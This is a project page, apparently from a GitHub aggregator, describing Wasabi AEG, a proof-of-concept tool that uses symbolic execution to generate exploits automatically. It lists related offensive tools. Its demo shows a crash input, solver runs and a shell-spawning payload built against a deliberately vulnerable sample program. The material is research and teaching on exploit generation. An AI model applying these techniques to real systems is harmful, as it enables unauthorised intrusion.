GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → macaron-et → Wasabi Aeg

macaron-et / Wasabi Aeg

Yet another implementation of AEG (Automated Exploit Generation) using symbolic execution engine Triton.

Programming Languages

python
139335 projects - #7 most used programming language

Labels

exploitsymbolic-execution

Projects that are alternatives of or similar to Wasabi Aeg

CRAX
CRAX: software CRash analysis for Automatic eXploit generation
Stars: ✭ 44 (+91.3%)
Mutual labels:  exploit, symbolic-execution
K8cscan
K8Cscan大型内网渗透自定义插件化扫描神器,包含信息收集、网络资产、漏洞扫描、密码爆破、漏洞利用,程序采用多线程批量扫描大型内网多个IP段C段主机,目前插件包含: C段旁注扫描、子域名扫描、Ftp密码爆破、Mysql密码爆破、Oracle密码爆破、MSSQL密码爆破、Windows/Linux系统密码爆破、存活主机扫描、端口扫描、Web信息探测、操作系统版本探测、Cisco思科设备扫描等,支持调用任意外部程序或脚本,支持Cobalt Strike联动
Stars: ✭ 693 (+2913.04%)
Mutual labels:  exploit
Am I Affected By Meltdown
Meltdown Exploit / Proof-of-concept / checks whether system is affected by Variant 3: rogue data cache load (CVE-2017-5754), a.k.a MELTDOWN.
Stars: ✭ 549 (+2286.96%)
Mutual labels:  exploit
Herpaderping
Process Herpaderping proof of concept, tool, and technical deep dive. Process Herpaderping bypasses security products by obscuring the intentions of a process.
Stars: ✭ 614 (+2569.57%)
Mutual labels:  exploit
Heap Viewer
An IDA Pro plugin to examine the glibc heap, focused on exploit development
Stars: ✭ 574 (+2395.65%)
Mutual labels:  exploit
Awesome Symbolic Execution
A curated list of awesome symbolic execution resources including essential research papers, lectures, videos, and tools.
Stars: ✭ 634 (+2656.52%)
Mutual labels:  symbolic-execution
Anticheat Testing Framework
Framework to test any Anti-Cheat
Stars: ✭ 481 (+1991.3%)
Mutual labels:  exploit
Shellen
🌸 Interactive shellcoding environment to easily craft shellcodes
Stars: ✭ 799 (+3373.91%)
Mutual labels:  exploit
Spectre Attack
Example of using revealed "Spectre" exploit (CVE-2017-5753 and CVE-2017-5715)
Stars: ✭ 690 (+2900%)
Mutual labels:  exploit
Deepstate
A unit test-like interface for fuzzing and symbolic execution
Stars: ✭ 603 (+2521.74%)
Mutual labels:  symbolic-execution
Windows Kernel Exploits
windows-kernel-exploits Windows平台提权漏洞集合
Stars: ✭ 5,963 (+25826.09%)
Mutual labels:  exploit
Cve 2019 11708
Full exploit chain (CVE-2019-11708 & CVE-2019-9810) against Firefox on Windows 64-bit.
Stars: ✭ 581 (+2426.09%)
Mutual labels:  exploit
Joomscan
OWASP Joomla Vulnerability Scanner Project
Stars: ✭ 640 (+2682.61%)
Mutual labels:  exploit
Tigress protection
Playing with the Tigress binary protection. Break some of its protections and solve some of its challenges. Automatic deobfuscation using symbolic execution, taint analysis and LLVM.
Stars: ✭ 550 (+2291.3%)
Mutual labels:  symbolic-execution
Htshells
Self contained htaccess shells and attacks
Stars: ✭ 708 (+2978.26%)
Mutual labels:  exploit
Hack Tools
hack tools
Stars: ✭ 488 (+2021.74%)
Mutual labels:  exploit
Rop Tool
A tool to help you write binary exploits
Stars: ✭ 590 (+2465.22%)
Mutual labels:  exploit
Penetration Testing Tools
A collection of more than 140+ tools, scripts, cheatsheets and other loots that I have developed over years for Red Teaming/Pentesting/IT Security audits purposes. Most of them came handy on at least one of my real-world engagements.
Stars: ✭ 614 (+2569.57%)
Mutual labels:  exploit
Xattacker
X Attacker Tool ☣ Website Vulnerability Scanner & Auto Exploiter
Stars: ✭ 897 (+3800%)
Mutual labels:  exploit
Oscp
Collection of things made during my OSCP journey
Stars: ✭ 709 (+2982.61%)
Mutual labels:  exploit
View All Similar Projects ➔

Wasabi AEG

This is yet another implementation of AEG (Automated Exploit Generation) using symbolic execution engine Triton, and just proof of concept.

This project is inspired by following researches.

Presentations

  • Girls Meets Symbolic Execution: Assertion 2. Automated Exploit Generation (at 第14回カーネル/VM探検隊) [Japanese, English]

Requirements

  • Triton and Pin tracer
    • NOTE: My Triton build number is 1380 (v 0.6). Triton's API is volatile. So you may need some patches for solver script in the future.
  • lief
  • Python2

Build

You must build sample vulnerable programs.

cd vuln-samples
make
cd -

Demo

Demo applicaitons are located in vuln-samples.

notes

🎉 Demo video (asciinema) 📷 is avaliable here!

notes has buffer overflow bug, and shellcode as instant_win() function.

We can obtain crash input using AFL and feed it into notes. We found that notes crashes at address 0x7ffff7a8c231.

K_atc% xxd vuln-samples/result-notes/crashes/id:000004,sig:07,src:000000,op:havoc,rep:32
00000000: 6ef8 5d69 74e9 6d0d 320a 730a 750a 330a  n.]it.m.2.s.u.3.
00000010: 6e6c 65ff 68ff ff6f 8121 212e 7a81 2121  nle.h..o.!!.z.!!
00000020: 20d5 0a63 6e6e 2120 d50a 636e 6e66 adad   ..cnn! ..cnnf..
00000030: adad 66ad adad adad adad ad22 adad adad  ..f........"....
00000040: adad ad9d adad adad 0d51 0a73 0a75 0a33  .........Q.s.u.3
00000050: 0a6e 6c65 ff28 ffff 6f81 2121 20d5 0a63  .nle.(..o.!! ..c
00000060: 6e6e 6e6e 6e81 e16e 6e6e 6e6e 7e6e 6e6f  nnnnn..nnnnn~nno
00000070: 6e21 ff00 730a 71                        n!..s.q

gdb-peda$ r < result-notes/crashes/id:000004,sig:07,src:000000,op:havoc,rep:32

[----------------------------------registers-----------------------------------]
... snipped ...
RBP: 0xadad9dadadadadad 
... snipped ...
[-------------------------------------code-------------------------------------]
... snipped ...
=> 0x7ffff7a8c231 <__GI__IO_getline_info+193>:  mov    BYTE PTR [rbp+0x0],al
... snipped ...
Stopped reason: SIGBUS
0x00007ffff7a8c231 in __GI__IO_getline_info () from /usr/lib/libc.so.6

Generate exploit payload in the following manner.

K_atc% export CRASHED_AT=0x7ffff7a8c231

K_atc% time ~/project/pin-2.14-71313-gcc.4.4.7-linux/source/tools/Triton/build/triton solve-notes.py vuln-samples/notes < vuln-samples/result-notes/crashes/id:000004,sig:07,src:000000,op:havoc,rep:32
... snipped ...
[TT] Solving Memory Access constriant...
[TT] Model for Memory Access: {64L: SymVar_64 = 0x60, 65L: SymVar_65 = 0x0, 66L: SymVar_66 = 0x0, 67L: SymVar_67 = 0x0, 68L: SymVar_68 = 0x0, 69L: SymVar_69 = 0x0, 95L: SymVar_95 = 0x10, 62L: SymVar_62 = 0xD8, 63L: SymVar_63 = 0x30}
~~~~~~~~
Found exploitable crash:  'n\x00\xf5\xf5\xf5\xf5\xf5\xf5\xf5\n\xf5\nu\x009:n\x00\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\n\xf5\xf5\xf5\xf5\xf5\xf5\n\xf8\x00n\x00\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xd80`\x00\x00\x00\x00\x00\xf5\xf5\xf5\xf5\n\xf5\nu\x001:\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\xf5\n\x10'
Crash inputs: 'n\xf8]it\xe9m\r2\ns\nu\n3\nnle\xffh\xff\xffo\x81!!.z\x81!! \xd5\ncnn! \xd5\ncnnf\xad\xad\xad\xadf\xad\xad\xad\xad\xad\xad\xad\xad"\xad\xad\xd80`\x00\x00\x00\x00\x00\xad\xad\rQ\ns\nu\n3\nnle\xff(\xff\xffo\x81!! \xd5\n\x10'
[TT] Reading remaining stdin...
    read stdin = ''nnnnn\x81\xe1nnnnn~nnon!\xff\x00s\nq''
[TT] crash input is saved as 'crash_inputs'
[TT] Go on to phase 2
~/project/pin-2.14-71313-gcc.4.4.7-linux/source/tools/Triton/build/triton   <  106.72s user 5.79s system 99% cpu 1:53.21 total

K_atc% time ~/project/pin-2.14-71313-gcc.4.4.7-linux/source/tools/Triton/build/triton solve-notes-phase-2.py vuln-samples/notes < crash_inputs
... snipped ...
~~~~~~~~
[TT] Automated Exploit Generation Done. Saving payload as 'exploit-payload'
[TT] Model for Memory Access: {96L: SymVar_96 = 0x12, 97L: SymVar_97 = 0x40, 98L: SymVar_98 = 0x0, 99L: SymVar_99 = 0x0, 100L: SymVar_100 = 0x0, 101L: SymVar_101 = 0x0, 102L: SymVar_102 = 0x0, 95L: SymVar_95 = 0x10}
Crash Inputs: 'n\xf8]it\xe9m\r2\ns\nu\n3\nnle\xffh\xff\xffo\x81!!.z\x81!! \xd5\ncnn! \xd5\ncnnf\xad\xad\xad\xadf\xad\xad\xad\xad\xad\xad\xad\xad"\xad\xad\xd80`\x00\x00\x00\x00\x00\xad\xad\rQ\ns\nu\n3\nnle\xff(\xff\xffo\x81!! \xd5\n\x10\[email protected]\x00\x00\x00\x00\x00nnnnn~nnon!\xff\x00s\nq'
To test payload: `(cat exploit-payload -) | ./vuln-samples/notes`
[TT] End
~/project/pin-2.14-71313-gcc.4.4.7-linux/source/tools/Triton/build/triton   <  69.77s user 6.09s system 99% cpu 1:16.34 total

Finally, we got exploit payload to spawn shell which works fine!

K_atc% xxd exploit-payload 
00000000: 6ef8 5d69 74e9 6d0d 320a 730a 750a 330a  n.]it.m.2.s.u.3.
00000010: 6e6c 65ff 68ff ff6f 8121 212e 7a81 2121  nle.h..o.!!.z.!!
00000020: 20d5 0a63 6e6e 2120 d50a 636e 6e66 adad   ..cnn! ..cnnf..
00000030: adad 66ad adad adad adad ad22 adad d830  ..f........"...0
00000040: 6000 0000 0000 adad 0d51 0a73 0a75 0a33  `........Q.s.u.3
00000050: 0a6e 6c65 ff28 ffff 6f81 2121 20d5 0a10  .nle.(..o.!! ...
00000060: 1240 0000 0000 006e 6e6e 6e6e 7e6e 6e6f  [email protected]~nno
00000070: 6e21 ff00 730a 71                        n!..s.q

K_atc% (cat exploit-payload -) | ./vuln-samples/notes
Exploit Me!!

---- [menu] ----

==== [note #3] ====
title: content: Congratz![Enter]
uname -a
Linux K_atc 4.17.2-1-ARCH #1 SMP PREEMPT Sat Jun 16 11:08:59 UTC 2018 x86_64 GNU/Linux
whoami
katc
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].